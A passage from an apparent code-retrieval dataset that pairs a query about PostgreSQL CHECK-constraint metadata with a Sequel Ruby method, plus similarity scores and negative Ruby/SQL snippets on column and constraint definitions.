"def create_processor_for_type(parameter_name, parameter_type, parameter_required)\n attributes_processors = create_attributes_processors_for_type(parameter_type)\n Sinatra::SwaggerExposer::Processing::SwaggerTypeValueProcessor.new(\n parameter_name,\n parameter_required,\n attributes_processors\n )\n end",
"def to_proc\n name, options, registry, variable_name = @name, @options, @registry, @iv_name\n Proc.new do\n build name => options\n registry.inject(instance_variable_get(:\"@#{variable_name}\")) do |value, (method, args, block)|\n value.send(method, *args, &block)\n end\n end\n end",
"def display_proc(&block)\n #defined by default_for_proc_type in initialize!\n end",
"def type_cast_code_with_patch(var_name)\n klass = self.class.name\n case type\n when /array$/\n base_type = type.to_s.gsub(/_array/, '')\n \"#{var_name}.from_postgres_array(:#{base_type.parameterize('_')})\"\n when :inet, :cidr\n \"#{klass}.cidr_to_string(#{var_name})\"\n else\n type_cast_code_without_patch(var_name)\n end\n end",
"def type(node, type); end",
"def register(type_name, klass = nil, **options, &block)\n registry.register(type_name, klass, **options, &block)\n end",
"def add_type(mod) #:nodoc:\n @t[mod] ||= Type.new(mod)\n end",
"def type_to_sql(*args); connection.type_to_sql(*args); end",
"def add_type(type)\n\n # nothing to be done\n end",
"def add_type(type)\n\n # nothing to be done\n end",
"def type_literal_generic_symbol(column)\n type_literal_generic_string(column)\n end",
"def writer_proc(&block)\n #defined by default_for_proc_type in initialize!\n end",
"def add_filter(type, &block)\n filters[type] << block\n end",
"def type(key, &blk)\n call_command(['type', key], &blk)\n end",
"def register_convertor(convertor_name, convertor_class)\n @registered_convertors[convertor_name] = convertor_class\n end",
"def sig(&block)\n HasType.set_last_proc(self, block)\n end",
"def machine_type(name, number, range=nil)\n machine_type = MachineType.new(name, number, range)\n @machine_types << machine_type\n # generates a method with given machine type name in a module\n # this module is included in Parameter class so machine type dependencies can be\n # given with machine type names (in DSL) instead of binary numbers\n ParameterMachineTypeBridge.send(:define_method, name) do\n machine_type.binary_number\n end\n end",
"def set_block_type\n @block_type = BlockType.find(params[:id])\n end",
"def lookup_cpptype(name)\n if t = root.lookup_cpptype(name) then return t \n elsif c = containing_class.typechild(name) then return c.cpptype\n elsif c= root.dotted_typechild(name) then return c.cpptype\n else raise \"Cannot resolve type-name #{name} from #{self}\" \n end\n end",
"def map_type type\n type\n end",
"def map_type type\n type\n end",
"def register_bundle_processor(mime_type, klass, &block)\n expire_index!\n\n if block_given?\n name = klass.to_s\n klass = Class.new(Processor) do\n @name = name\n @processor = block\n end\n end\n\n @bundle_processors[mime_type].push(klass)\n end",
"def set_type sym, type\n @types[sym] = type\n end",
"def each_type(&block)\n if block_given?\n @types.each_value(&block)\n self\n else\n @types.values\n end\n end",
"def add_virtual_column(name, type = :string)\n virtual_columns[name.to_sym] = {\n :type => type\n }\n end"
] |
[
"0.69109946",
"0.6309396",
"0.5923431",
"0.5917636",
"0.5862878",
"0.57383573",
"0.5684644",
"0.55541337",
"0.5495757",
"0.54407096",
"0.54395115",
"0.54209137",
"0.53729755",
"0.53537726",
"0.5343672",
"0.533057",
"0.523242",
"0.5228982",
"0.5200437",
"0.5194037",
"0.51849186",
"0.5154962",
"0.50964993",
"0.5096045",
"0.5093398",
"0.5004211",
"0.49915305",
"0.4944266",
"0.4938597",
"0.4935608",
"0.4935608",
"0.49091476",
"0.48555166",
"0.48447168",
"0.4842543",
"0.48412254",
"0.48310792",
"0.48308432",
"0.48094928",
"0.48077783",
"0.48012903",
"0.4784302",
"0.47807294",
"0.4754139",
"0.47362792",
"0.47213686",
"0.4719029",
"0.47089586",
"0.47064704",
"0.47056472",
"0.4701297",
"0.469232",
"0.4687743",
"0.46867588",
"0.46494487",
"0.4630579",
"0.4629083",
"0.4615887",
"0.45912275",
"0.45907217",
"0.45723265",
"0.45667386",
"0.4560916",
"0.45588344",
"0.4551602",
"0.45387918",
"0.45385084",
"0.45302218",
"0.45212072",
"0.45209172",
"0.4501617",
"0.4500173",
"0.4499655",
"0.44986567",
"0.4495654",
"0.4494342",
"0.4494323",
"0.44920585",
"0.44878617",
"0.4485109",
"0.4475799",
"0.44621518",
"0.44531444",
"0.44522792",
"0.44522792",
"0.4451651",
"0.44453534",
"0.4442064",
"0.44416735",
"0.44413954",
"0.44341144",
"0.44315976",
"0.44299936",
"0.4429866",
"0.44292367",
"0.44292367",
"0.44231266",
"0.44218862",
"0.44185516",
"0.44175184"
] |
0.8404523
|
0
|
A hash of metadata for CHECK constraints on the table. Keys are CHECK constraint name symbols. Values are hashes with the following keys: :definition :: An SQL fragment for the definition of the constraint :columns :: An array of column symbols for the columns referenced in the constraint, can be an empty array if the database cannot deteremine the column symbols.
|
def check_constraints(table)
m = output_identifier_meth
hash = {}
_check_constraints_ds.where_each(:conrelid=>regclass_oid(table)) do |row|
constraint = m.call(row[:constraint])
entry = hash[constraint] ||= {:definition=>row[:definition], :columns=>[]}
entry[:columns] << m.call(row[:column]) if row[:column]
end
hash
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def constraint_definition_sql(constraint)\n sql = String.new\n sql << \"CONSTRAINT #{quote_identifier(constraint[:name])} \" if constraint[:name] \n case constraint[:type]\n when :check\n check = constraint[:check]\n check = check.first if check.is_a?(Array) && check.length == 1\n check = filter_expr(check)\n check = \"(#{check})\" unless check[0..0] == '(' && check[-1..-1] == ')'\n sql << \"CHECK #{check}\"\n when :primary_key\n sql << \"#{primary_key_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << column_references_table_constraint_sql(constraint.merge(:deferrable=>nil))\n when :unique\n sql << \"#{unique_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n else\n raise Error, \"Invalid constraint type #{constraint[:type]}, should be :check, :primary_key, :foreign_key, or :unique\"\n end\n constraint_deferrable_sql_append(sql, constraint[:deferrable])\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n sql << \"CHECK #{filter_expr(constraint[:check])}\"\n sql\n end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map(&:inspect).join(', ')}\"\n end\n when :foreign_key\n c.delete(:on_delete) if c[:on_delete] == :no_action\n c.delete(:on_update) if c[:on_update] == :no_action\n c.delete(:deferrable) unless c[:deferrable]\n cols = c.delete(:columns)\n table = c.delete(:table)\n \"#{type} #{cols.inspect}, #{table.inspect}#{opts_inspect(c)}\"\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map{|x| x.inspect}.join(', ')}\"\n end\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def conditions_from_constraints\n hash_conditions = {}\n conditions = [hash_conditions]\n active_scaffold_constraints.each do |k, v|\n column = active_scaffold_config.columns[k]\n if column\n # Assume this is a multi-level association constraint.\n # example:\n # data model: Park -> Den -> Bear\n # constraint: :den => {:park => 5}\n if params_hash? v\n far_association = column.association.klass.reflect_on_association(v.keys.first)\n field = far_association.klass.primary_key\n table = far_association.table_name\n\n active_scaffold_references.concat([{k => far_association.name}]) # e.g. {:den => :park}\n hash_conditions.deep_merge!(table => {field => v.values.first})\n\n # association column constraint\n elsif column.association\n join_from_association_constraint(column)\n hash_conditions.deep_merge!(condition_from_association_constraint(column.association, v))\n\n # regular column constraints\n elsif column.searchable? && params[column.name] != v\n active_scaffold_references.concat column.references if column.includes.present?\n conditions << [column.search_sql.collect { |search_sql| \"#{search_sql} = ?\" }.join(' OR '), *([v] * column.search_sql.size)]\n end\n # unknown-to-activescaffold-but-real-database-column constraint\n elsif active_scaffold_config._columns_hash[k.to_s] && params[column.name] != v\n hash_conditions.deep_merge!(k => v)\n else\n raise ActiveScaffold::MalformedConstraint, constraint_error(active_scaffold_config.model, k), caller\n end\n end\n conditions.reject(&:blank?)\n end",
"def column_definition_sql(column)\n return constraint_definition_sql(column) if column[:type] == :check\n sql = \"#{quote_identifier(column[:name])} #{type_literal(TYPES[column[:type]])}\"\n column[:size] ||= 255 if column[:type] == :varchar\n elements = column[:size] || column[:elements]\n sql << literal(Array(elements)) if elements\n sql << UNSIGNED if column[:unsigned]\n sql << UNIQUE if column[:unique]\n sql << NOT_NULL if column[:null] == false\n sql << NULL if column[:null] == true\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n sql << PRIMARY_KEY if column[:primary_key]\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n if column[:table]\n sql << \" REFERENCES #{quote_identifier(column[:table])}\"\n sql << \"(#{quote_identifier(column[:key])})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n end\n sql\n end",
"def column_definition_sql(column)\n return constraint_definition_sql(column) if column[:type] == :check\n sql = \"#{quote_identifier(column[:name])} #{type_literal(column)}\"\n sql << UNIQUE if column[:unique]\n sql << NOT_NULL if column[:null] == false\n sql << NULL if column[:null] == true\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n sql << PRIMARY_KEY if column[:primary_key]\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n sql << column_references_sql(column) if column[:table]\n sql\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def column_definition_sql(column)\n return constraint_definition_sql(column) if column[:type] == :check\n sql = \"#{quote_identifier(column[:name])} #{type_literal(column)}\"\n sql << UNIQUE if column[:unique]\n sql << NOT_NULL if column[:null] == false\n sql << NULL if column[:null] == true\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n sql << PRIMARY_KEY if column[:primary_key]\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n sql << column_references_sql(column) if column[:table]\n sql\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end",
"def descriptions\n\t\treturn self.constraints.each_with_object({}) do |(field,constraint), hash|\n\t\t\thash[ field ] = constraint.description\n\t\tend\n\tend",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def crdb_column_definitions(table_name)\n fields = \\\n query(<<~SQL, \"SCHEMA\")\n SELECT c.column_name, c.column_comment, c.crdb_sql_type, c.is_hidden::BOOLEAN\n FROM information_schema.columns c\n WHERE c.table_name = #{quote(table_name)}\n SQL\n\n fields.reduce({}) do |a, e|\n a[e[0]] = e\n a\n end\n end",
"def build_constraints\n Schema::Logical::Constraint.new\n end",
"def column_definition_references_sql(sql, column)\n if column[:table]\n if name = column[:foreign_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << column_references_column_constraint_sql(column)\n end\n end",
"def to_dump(opts={})\n dump = \"\"\n dump << \"add_column_check_constraint #{table_name.to_s}, #{column_name.to_s}\" unless opts[:inline]\n dump << \", check: #{check.inspect}\"\n dump << \"\\n\"\n dump\n end",
"def column_references_sql(column)\n sql = String.new\n sql << \" REFERENCES #{quote_schema_table(column[:table])}\"\n sql << \"(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(', ')})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n sql << \" ON UPDATE #{on_update_clause(column[:on_update])}\" if column[:on_update]\n constraint_deferrable_sql_append(sql, column[:deferrable])\n sql\n end",
"def column_list_sql(generator)\n (generator.columns.map{|c| column_definition_sql(c)} + generator.constraints.map{|c| constraint_definition_sql(c)}).join(', ')\n end",
"def hdf_descriptions(config_rule)\n [\n {\n label: 'check',\n data: check_text(config_rule)\n },\n ]\n end",
"def known_rules\n @table.keys\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def column_hash\n @table.hashes.reduce({}) do |h, row|\n row.each do |k,v|\n (h[k.symbolize] ||= []) << parse_formula(v)\n end\n h\n end\n end",
"def compound_key_constraints\n @compound_key_constraints ||= {}\n end",
"def to_constr\n @hash.map{|id, ty|\n Constraint.new(Type::TyVar[id], ty)\n }\n end",
"def constraints; end",
"def constraints; end",
"def constraints; end",
"def column_references_sql(column)\n sql = \" REFERENCES #{quote_schema_table(column[:table])}\"\n sql << \"(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(COMMA_SEPARATOR)})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n sql << \" ON UPDATE #{on_delete_clause(column[:on_update])}\" if column[:on_update]\n sql\n end",
"def column_definitions(table_name)\n fields = query(<<~SQL, \"SCHEMA\")\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n c.collname, NULL AS comment,\n #{supports_virtual_columns? ? 'attgenerated' : quote('')} as attgenerated,\n NULL as is_hidden\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n LEFT JOIN pg_type t ON a.atttypid = t.oid\n LEFT JOIN pg_collation c ON a.attcollation = c.oid AND a.attcollation <> t.typcollation\n WHERE a.attrelid = #{quote(quote_table_name(table_name))}::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n SQL\n\n crdb_fields = crdb_column_definitions(table_name)\n\n # Use regex comparison because if a type is an array it will\n # have [] appended to the end of it.\n target_types = [\n /geometry/,\n /geography/,\n /interval/,\n /numeric/\n ]\n\n re = Regexp.union(target_types)\n fields.map do |field|\n dtype = field[1]\n field[1] = crdb_fields[field[0]][2].downcase if re.match(dtype)\n field[7] = crdb_fields[field[0]][1]&.gsub!(/^\\'|\\'?$/, '')\n field[9] = true if crdb_fields[field[0]][3]\n field\n end\n fields.delete_if do |field|\n # Don't include rowid column if it is hidden and the primary key\n # is not defined (meaning CRDB implicitly created it).\n if field[0] == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n field[9] && !primary_key(table_name)\n else\n false # Keep this entry.\n end\n end\n end",
"def column_references_sql(column)\n sql = \" REFERENCES #{quote_schema_table(column[:table])}\"\n sql << \"(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(COMMA_SEPARATOR)})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n sql << \" ON UPDATE #{on_delete_clause(column[:on_update])}\" if column[:on_update]\n sql\n end",
"def column_references_column_constraint_sql(column)\n column_references_sql(column)\n end",
"def columns_hash\n self\n end",
"def column_definitions(table_name) # :nodoc:\n query(<<-end_sql, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n format_encoding(a.attencodingtype::integer)\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def column_definitions(table_name)\n select_rows(<<-end_sql, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n (SELECT c.collname FROM pg_collation c, pg_type t\n WHERE c.oid = a.attcollation AND t.oid = a.atttypid\n AND a.attcollation <> t.typcollation),\n col_description(a.attrelid, a.attnum) AS comment\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = #{quote(quote_table_name(table_name))}::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def column_definitions(table_name)\r\n query <<-end_sql\r\n SELECT a.attname, format_type(a.atttypid, a.atttypmod), d.adsrc, a.attnotnull, c.consrc\r\n FROM pg_attribute a LEFT JOIN pg_attrdef d\r\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\r\n LEFT JOIN pg_constraint c ON a.attrelid = c.conrelid AND \r\n c.contype = 'c' AND c.conkey[1] = a.attnum\r\n WHERE a.attrelid = '#{table_name}'::regclass\r\n AND a.attnum > 0 AND NOT a.attisdropped\r\n ORDER BY a.attnum\r\n end_sql\r\n end",
"def column_definitions(table_name) # :nodoc:\n local_condition = 'AND a.attislocal IS TRUE' if @_dump_mode\n query(<<-SQL, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n (SELECT c.collname FROM pg_collation c, pg_type t\n WHERE c.oid = a.attcollation AND t.oid = a.atttypid AND a.attcollation <> t.typcollation),\n col_description(a.attrelid, a.attnum) AS comment\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0\n AND a.attisdropped IS FALSE\n #{local_condition}\n ORDER BY a.attnum\n SQL\n end",
"def order_column_definitions\n dump.gsub!(/^(?<table>CREATE TABLE .+?\\(\\n)(?<columns>.+?)(?=\\n\\);$)/m) do\n table = $~[:table]\n columns =\n $~[:columns]\n .split(\",\\n\")\n .sort_by { |column| column.delete('\"') }\n .partition { |column| !column.match?(/\\A *CONSTRAINT/) }\n .flatten\n .join(\",\\n\")\n\n [table, columns].join\n end\n end",
"def order_column_definitions\n dump.gsub!(/^(?<table>CREATE TABLE .+?\\(\\n)(?<columns>.+?)(?=\\n\\);$)/m) do\n columns =\n $~[:columns]\n .split(\",\\n\")\n .sort_by { |column| column[/[^ \"]+/] }\n .partition { |column| !column.match?(/\\A *CONSTRAINT/) }\n .flatten\n .join(\",\\n\")\n\n [$~[:table], columns].join\n end\n end",
"def column_definitions(table_name) #:nodoc:\n exec_query(<<-end_sql, 'SCHEMA').rows\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def column_definition_primary_key_sql(sql, column)\n if column[:primary_key]\n if name = column[:primary_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << \" \" << primary_key_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:primary_key_deferrable])\n end\n end",
"def schema_meta_structure\n CreateVersionsTableQuery.new.to_cql\n end",
"def column_definitions(table_name) #:nodoc:\n exec_query(<<-end_sql, 'SCHEMA')\n SELECT a.attname as column_name, format_type(a.atttypid, a.atttypmod) as column_type, d.adsrc as column_default, a.attnotnull as column_not_null\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def column_definitions(table_name) #:nodoc:\n query <<-end_sql\nselect\nc.name,\ncase\nwhen t.name in ('char', 'varchar', 'nchar', 'nvarchar') then 'string'\nwhen t.name in ('binary', 'varbinary', 'image') then 'binary'\nwhen t.name in ('int', 'smallint', 'tinyint') then 'integer'\nwhen t.name in ('datetime', 'smalldatetime') then 'datetime'\nwhen t.name = 'bit' then 'boolean'\nwhen t.name = 'numeric' and c.prec < 10 and c.scale = 0 then 'integer'\nwhen t.name = 'numeric' then 'decimal'\nwhen t.name = 'text' then 'text'\nelse t.name\nend type,\nd.text,\nc.isnullable\nfrom\nsyscolumns c\ninner join systypes t\non c.xusertype = t.xusertype\nleft outer join syscomments d\non c.cdefault = d.id\nwhere\nc.id = object_id('#{table_name}')\norder by\nc.colid\nend_sql\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def column_definitions(table_name)\n select_rows(<<-end_sql, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
